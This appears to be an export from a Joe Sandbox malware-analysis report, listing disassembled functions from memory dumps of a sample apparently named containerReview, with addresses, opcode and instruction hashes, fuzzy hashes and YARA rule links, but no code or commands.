                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b54800de5f103c3e69fadb951c9d9d91a227016c099684a58e15afa3c8bb27c5
                                                                    • Instruction ID: 377ef3f9098797b374edc95d2e5b3918bb52708ed6b1066c9df3ab10ccc9081f
                                                                    • Opcode Fuzzy Hash: b54800de5f103c3e69fadb951c9d9d91a227016c099684a58e15afa3c8bb27c5
                                                                    • Instruction Fuzzy Hash: 29F0E53024EA8DCFD742AB3DD8958D4BF60EF07215B9A12FAD489C7562D325585ECB01
                                                                    Function 00007FF848E8563C Relevance: .0, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 895523474eca11f6e4b9fbed8216664c3a21ebcb3f711ea33d7a945ed48ddad8
                                                                    • Instruction ID: d77675c7d547c0a17dbe9820e1f73c9714de1f05c61ba72af25090dc93b9c494
                                                                    • Opcode Fuzzy Hash: 895523474eca11f6e4b9fbed8216664c3a21ebcb3f711ea33d7a945ed48ddad8
                                                                    • Instruction Fuzzy Hash: B4F0303090C9098EEA64F704DC446BC7392FF54390F9011B9D84ED71A2EF386D858658
                                                                    Function 00007FF848E95318 Relevance: .0, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e90000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d1c7dfccc88d550a0c504ef7a6d8429f03d32075b32a422873b135f7d92b8df
                                                                    • Instruction ID: 67ad311bbae10528dce9f47e595fd9c11aa355e4fa4cc1cfe2b6645ebd16570c
                                                                    • Opcode Fuzzy Hash: 1d1c7dfccc88d550a0c504ef7a6d8429f03d32075b32a422873b135f7d92b8df
                                                                    • Instruction Fuzzy Hash: 88D05E30B609094B8B0CF62D8458530B3D1F7AA206B945278940BC2281ED25ECCA8B84
                                                                    Function 00007FF848E924F0 Relevance: .0, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e90000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e050b8d54ee86617a2a68f3a03fac4af5aa2a852a7c447093bc185dd0ecb348e
                                                                    • Instruction ID: d536b0b7594c68bf11e196fe4619790ef5851cd828fa184b4159703cb5ead883
                                                                    • Opcode Fuzzy Hash: e050b8d54ee86617a2a68f3a03fac4af5aa2a852a7c447093bc185dd0ecb348e
                                                                    • Instruction Fuzzy Hash: 47D0A730B60A0D4B8B0CB63D8458430F3D6F7AA6167D4527CD41BC3281ED25ECC6CB84
                                                                    Function 00007FF848E93A70 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e90000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                    • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                    • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                    • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                    Function 00007FF848E833D1 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 840ea9db971bae5ca5a55bab3c63b7ccc2f8042cc0857c3fcf9c753694177ce7
                                                                    • Instruction ID: 046c02f351ebf6e178f43edd27036e0ef35a4df4f292487b2858fb33ef37a117
                                                                    • Opcode Fuzzy Hash: 840ea9db971bae5ca5a55bab3c63b7ccc2f8042cc0857c3fcf9c753694177ce7
                                                                    • Instruction Fuzzy Hash: FDE01A20F0D5164FF7A0BA10C8503BD22A1BF85381FA540B9D85DA76D6CF387C819B49
                                                                    Function 00007FF848E83759 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c65b34f3da250d97909dd8db00a8f56844a8e0302d20651c1dff839b0102c68
                                                                    • Instruction ID: 9e67842167211249aa2750043df0da6b447c19746b8c1d91bf2d4b2621c6f3cd
                                                                    • Opcode Fuzzy Hash: 0c65b34f3da250d97909dd8db00a8f56844a8e0302d20651c1dff839b0102c68
                                                                    • Instruction Fuzzy Hash: FCE01711E6C9964EF29DB66C44323BD91C2BF98791F884179D84ED32C3EE2D2C4003AA
                                                                    Function 00007FF848E806AD Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 323143e45dad86b09f48beb01337b17f3d2661350671268fcf99a56f238fe930
                                                                    • Instruction ID: 975a429da94f507ce98a6bebbc95ca6e60c52af6d5df34fa5a0daabfc2291f1e
                                                                    • Opcode Fuzzy Hash: 323143e45dad86b09f48beb01337b17f3d2661350671268fcf99a56f238fe930
                                                                    • Instruction Fuzzy Hash: 1AC08C00D0F91B08E440716E14020ACA2007FC42A0FE10032C02C42091DE7D20C5126E
                                                                    Function 00007FF848E94718 Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e90000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 387e63c72d1cec51fb15f3eb6a8ae46cde76971a7f43caf43f88bfad3b8c216e
                                                                    • Instruction ID: 7a861ee34c598d600c05458adac048a52c3099e0dc9dabacd867652a4b5362f1
                                                                    • Opcode Fuzzy Hash: 387e63c72d1cec51fb15f3eb6a8ae46cde76971a7f43caf43f88bfad3b8c216e
                                                                    • Instruction Fuzzy Hash: 1ED0C930A1C64E8FDB44EE0DC880EAA33E1FF48708F104960E92983392DA35FC129B94
                                                                    Function 00007FF848E80B18 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 679052432ff82eb440096a9787cbb4eb0fdac5f2628a477f2cc6cb2b7cc5e99a
                                                                    • Instruction ID: f7fd61c8a668a15e4fe7e5eeb653d5778f38aa54c35724653029127ec2c5aa3a
                                                                    • Opcode Fuzzy Hash: 679052432ff82eb440096a9787cbb4eb0fdac5f2628a477f2cc6cb2b7cc5e99a
                                                                    • Instruction Fuzzy Hash: 63C04C305258098FC948FB6DC98595476A0FB0D215BD50190E40DC7171E66ADC95C745
                                                                    Function 00007FF848E812E0 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b6d50836501c865efaa9cc7746ad9c52898e749de2a98b2e8a9a856be5527891
                                                                    • Instruction ID: b45a823de4a7ad12bb9cba005a1a62d8887fa36159e3a53ced2d4a75ffe5d57a
                                                                    • Opcode Fuzzy Hash: b6d50836501c865efaa9cc7746ad9c52898e749de2a98b2e8a9a856be5527891
                                                                    • Instruction Fuzzy Hash: 3AC04C345658098FC948FB29C88591877A1FF19215BD50090E409C7175E669ECD5D745
                                                                    Function 00007FF848E857D9 Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 80322ac1325a1463ceb9144eda8732d4d7cd8aede239a8c97ec781aae84c4cab
                                                                    • Instruction ID: 9dacd7f668f7ed693adaad08fdea8a3a11775924b8ba6c3a1dbd7cc6940d13d8
                                                                    • Opcode Fuzzy Hash: 80322ac1325a1463ceb9144eda8732d4d7cd8aede239a8c97ec781aae84c4cab
                                                                    • Instruction Fuzzy Hash: 67C08C02E0DC165AE25A6204402127E0402DF80B44F948031E00EC32CACE0D1F0102CA
                                                                    Function 00007FF848E99E2C Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e90000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 620c7368c46946f6817b0a49db0d192115278756ad70b01ce43164f8a5ab9dde
                                                                    • Instruction ID: c1d6338047fb338b2b3ce4dbc27f20020f7ee17094d9585768b7859706ed9af5
                                                                    • Opcode Fuzzy Hash: 620c7368c46946f6817b0a49db0d192115278756ad70b01ce43164f8a5ab9dde
                                                                    • Instruction Fuzzy Hash: 7CD0C930C095188FEBA0EB54C840B9976B1BF48341F5001F6900DE3285CB356DC0CF81
                                                                    Function 00007FF848E806D0 Relevance: .0, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.2407401324.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_7ff848e80000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bca8a15959f7e0967de320f3aa0157698c38b87efa68259d0e12dbbb75d0c1cf
                                                                    • Instruction ID: 2932be79b3526a7ddfbf029d32fcd2008550c81a4f0c762fb69f1e712dbfd9a0
                                                                    • Opcode Fuzzy Hash: bca8a15959f7e0967de320f3aa0157698c38b87efa68259d0e12dbbb75d0c1cf
                                                                    • Instruction Fuzzy Hash: AEB01200C5E40F04E40431BA084206C70407FC4140FC10070D41C51085D9AD1094035A

                                                                    Executed Functions

                                                                    Function 00007FF848E707AE Relevance: 2.5, Strings: 1, Instructions: 1226COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: N_H
                                                                    • API String ID: 0-3193329873
                                                                    • Opcode ID: 3ffb34132280a7be48713131f4a289850fd853b3407e5617665c809de3548b34
                                                                    • Instruction ID: b298f9428fc9d08dea4a70900634f29aa42100c7ae08581ec85fa3d212dc3326
                                                                    • Opcode Fuzzy Hash: 3ffb34132280a7be48713131f4a289850fd853b3407e5617665c809de3548b34
                                                                    • Instruction Fuzzy Hash: B7829131E1C95A9FEA98FA2884556B873E2FF98780F5445B9D00DC32C7DF39AC428745
                                                                    Function 00007FF848E70CFB Relevance: 2.2, Strings: 1, Instructions: 999COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: N_H
                                                                    • API String ID: 0-3193329873
                                                                    • Opcode ID: 730fea9d2b083488a5f27a3fbc9f065368e4d5bdda054dabaec08f94dc07a49d
                                                                    • Instruction ID: c824de5d42be0e30370375e26c274b4104949b35c224dd4a0604423fed3b1a9b
                                                                    • Opcode Fuzzy Hash: 730fea9d2b083488a5f27a3fbc9f065368e4d5bdda054dabaec08f94dc07a49d
                                                                    • Instruction Fuzzy Hash: 25629131E1C95A9FEB98FA2884517B873A2FF98780F5445B9D00DD32C6DF39AC428B45
                                                                    Function 00007FF848E60D7C Relevance: .3, Instructions: 273COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 98132a30e244f68d86c4b3900f04140b4861a5b91ee6037db6acd3d1e2bab0f3
                                                                    • Instruction ID: 25b4687f663bb0649a38246a37a3bdc7252fb5a5b051ee5a2d375d9c5d65edb7
                                                                    • Opcode Fuzzy Hash: 98132a30e244f68d86c4b3900f04140b4861a5b91ee6037db6acd3d1e2bab0f3
                                                                    • Instruction Fuzzy Hash: FCA1A075D1CA998FE789EB68C8293A97FE1FB96350F4401BAC049E73D2DB7818058711
                                                                    Function 00007FF848E60B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c9$!k9$"s9
                                                                    • API String ID: 0-3426396564
                                                                    • Opcode ID: d2e26fa0ed65657ae63860e0153e178c88320430f77beff0b58864d7961f4ac1
                                                                    • Instruction ID: ea2171c56bb580886a4ffbd80badf8b0638c16910a09b71096214cd4efb4d34e
                                                                    • Opcode Fuzzy Hash: d2e26fa0ed65657ae63860e0153e178c88320430f77beff0b58864d7961f4ac1
                                                                    • Instruction Fuzzy Hash: FA01F22A31D95A8FC7026A3EB4905D87B50EAC6136BC905BBD544CB192E2102C9EC7E0
                                                                    Function 00007FF848E608D0 Relevance: .2, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7ef129662e63cf8afdf68e68f70d305ac08f166c31c6b2892cc64ec3a2337c6d
                                                                    • Instruction ID: a2c8d4a1b511e95981a3bac28a713e6b916601443891ffe215bba6d392399fc8
                                                                    • Opcode Fuzzy Hash: 7ef129662e63cf8afdf68e68f70d305ac08f166c31c6b2892cc64ec3a2337c6d
                                                                    • Instruction Fuzzy Hash: 70414A62A4D9652FE708B77CA0552F97781FF853A1F0C45BBD04DCB1D3DE2868418798
                                                                    Function 00007FF848E60998 Relevance: .1, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2996f936df23793d72ec99126f008f779d4878b8ab9e23a17f5223e7e9ea57bc
                                                                    • Instruction ID: b5b03d840107bb222149a96c79b3974a1baac377bbc725d5396021cf4e7944c1
                                                                    • Opcode Fuzzy Hash: 2996f936df23793d72ec99126f008f779d4878b8ab9e23a17f5223e7e9ea57bc
                                                                    • Instruction Fuzzy Hash: 3E21F821B1D9591FE798B63C945A67977C2FB993A1F5801B9E40EC32D3DE24BC414284
                                                                    Function 00007FF848E611A1 Relevance: .1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4a4c0e1c738514fd26714bb5c73a5590597ccf0b7e9a990b4d29772478015338
                                                                    • Instruction ID: 0e341ee5ead8f6b1d01daf2da396acd29288f6ec26dd1e62119d3b52bd52aba0
                                                                    • Opcode Fuzzy Hash: 4a4c0e1c738514fd26714bb5c73a5590597ccf0b7e9a990b4d29772478015338
                                                                    • Instruction Fuzzy Hash: 4631733090C65A8FDB46FB68C8599B97BF0FF5A350F4505BBC009E72A2DB39A841CB50
                                                                    Function 00007FF848E60C25 Relevance: .1, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cdb18c8c02bf1153612e7a697d7eb6d139c8a36b8c4c6f06c490df6aa09da9aa
                                                                    • Instruction ID: e1716adb053d76196e3ee565fe82297acaa4391a127ba6d70fb3fd90ddfa0ad5
                                                                    • Opcode Fuzzy Hash: cdb18c8c02bf1153612e7a697d7eb6d139c8a36b8c4c6f06c490df6aa09da9aa
                                                                    • Instruction Fuzzy Hash: 5521EF7190C699AFE712FB68C8452EC7FA0FF423A0F5545BAC044AB1C2DB3829898795
                                                                    Function 00007FF848E65534 Relevance: .1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: afed2b0bd37319d3596617c788645154cf78e4c6900a0da9614316893c93ac9d
                                                                    • Instruction ID: 5a5fb26b5a360e80a853b985bf0c795c75e97f94f7fe8126292690efb4c8a6ba
                                                                    • Opcode Fuzzy Hash: afed2b0bd37319d3596617c788645154cf78e4c6900a0da9614316893c93ac9d
                                                                    • Instruction Fuzzy Hash: C7113320E1CA1D4EE764BA1898592B872D1FF64350F9001B9D40EF72E3EF387D458649
                                                                    Function 00007FF848E60C40 Relevance: .0, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: abf99f9d6da5f1ee9a06b15bf328e92f7abbe2fc998a25cf68453c51e3e1192b
                                                                    • Instruction ID: f014a9776ce4ace1c321e131a013213350cba038f7e64a5605fa89d0002d1555
                                                                    • Opcode Fuzzy Hash: abf99f9d6da5f1ee9a06b15bf328e92f7abbe2fc998a25cf68453c51e3e1192b
                                                                    • Instruction Fuzzy Hash: DD01A93190D7989FE702FB68C8402D9BFB0EF42260F1545E6C084EB292D6386A488B94
                                                                    Function 00007FF848E60C48 Relevance: .0, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05b8f81623dcae733afc4ba835cf905964f673d098c8caed54aa53849524525a
                                                                    • Instruction ID: 5b81689088e1651b8ea27da21b17f62667958134c266d0842065b5076d6c5dd7
                                                                    • Opcode Fuzzy Hash: 05b8f81623dcae733afc4ba835cf905964f673d098c8caed54aa53849524525a
                                                                    • Instruction Fuzzy Hash: 4C015A7190D7889FE706EB78C844699BFB0EF42314F1945EAD044EB2A2D6386A48C795
                                                                    Function 00007FF848E6566A Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 739d002ec5213039a5f7b98b8673b3be312f800da77b00de52093fa9fbd50bdc
                                                                    • Instruction ID: d9e9e5e114ba3435dc3cd7457d5a57069b717a1a9f1459f116fc6fd3c0df7d05
                                                                    • Opcode Fuzzy Hash: 739d002ec5213039a5f7b98b8673b3be312f800da77b00de52093fa9fbd50bdc
                                                                    • Instruction Fuzzy Hash: 63F0313090C91E8EEB64FA14DC486B873A2FF64351F9001B9D44EF7192EF387D958A08
                                                                    Function 00007FF848E61A46 Relevance: .0, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e0b99f64bb1fda51415b1bd59b0be423a4f8d25f5f54f5b84ab6c10860375941
                                                                    • Instruction ID: 9da98854f2cb1fa8bea063587dbf61646fcc54533b7e8b665480afad00e325f8
                                                                    • Opcode Fuzzy Hash: e0b99f64bb1fda51415b1bd59b0be423a4f8d25f5f54f5b84ab6c10860375941
                                                                    • Instruction Fuzzy Hash: E1011D31908918CFCB58EB18D894E9973F1FBA8310F0402A9D40EE72A1CB35AE80CF85
                                                                    Function 00007FF848E60C50 Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b63f48097854e00b1a5efbafa16e2e13b220365cbaaa931434158e922177c1ea
                                                                    • Instruction ID: 1d494a934a9f4f92c3d2dbaecd3e8bb8dcd43c5ac94dc5e43bfe9a6d2a606513
                                                                    • Opcode Fuzzy Hash: b63f48097854e00b1a5efbafa16e2e13b220365cbaaa931434158e922177c1ea
                                                                    • Instruction Fuzzy Hash: 40014B7090D7C99FE706FB74884469DBFF0EF06314F1845E6D444EB292DA386A48C745
                                                                    Function 00007FF848E60B77 Relevance: .0, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 92b1d6e696249f69f5da86c40962c806f604502be92e693957885830a56fb57b
                                                                    • Instruction ID: 0463724105c59fff87dbdcdee3fb92fd12cc528830111bc805b7b8e71b0cb601
                                                                    • Opcode Fuzzy Hash: 92b1d6e696249f69f5da86c40962c806f604502be92e693957885830a56fb57b
                                                                    • Instruction Fuzzy Hash: 9AF0553020DA89CFC742AB3DC8A08D0BF60FF43204B8A00FAC088CB462C3245C5ECB00
                                                                    Function 00007FF848E6563C Relevance: .0, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 895523474eca11f6e4b9fbed8216664c3a21ebcb3f711ea33d7a945ed48ddad8
                                                                    • Instruction ID: 44e6ecc7956d6d1cc20c6e6cfc4d34b3b502825c445b06d011b98d177ef14cdb
                                                                    • Opcode Fuzzy Hash: 895523474eca11f6e4b9fbed8216664c3a21ebcb3f711ea33d7a945ed48ddad8
                                                                    • Instruction Fuzzy Hash: 5BF03030A0C9198EEA64F604DC486B87392FF64390F9011BAD84EF71A3EF387D858648
                                                                    Function 00007FF848E750F8 Relevance: .0, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000027.00000002.2394242705.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_39_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
